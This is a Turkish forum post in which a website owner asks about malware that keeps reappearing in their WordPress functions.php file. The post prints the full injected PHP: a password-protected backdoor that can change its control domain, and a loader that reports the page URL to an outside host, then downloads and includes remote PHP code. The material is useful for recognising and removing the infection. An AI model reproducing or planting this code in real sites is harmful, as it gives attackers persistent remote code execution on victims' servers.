Tekil Mesaj gösterimi - Bu virüs hakkında bilginiz var mı ? - R10.net

Konu Bu virüs hakkında bilginiz var mı ?

13-08-2017, 17:00:07

#1

ankaradabiz

Selamlar, sitemizde functions.php dosyasının sürekli olarak bu kod oluşturuyor. Sildiğimiz halde yine geliyor.

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5143676ae7535c75c3bc169b3c68cd23'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code6\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

if ( ! function_exists( 'wp_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if($tmpcontent = @file_get_contents("http://www.aotson.com/code6.php?i=".$path))
{

function wp_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}

?>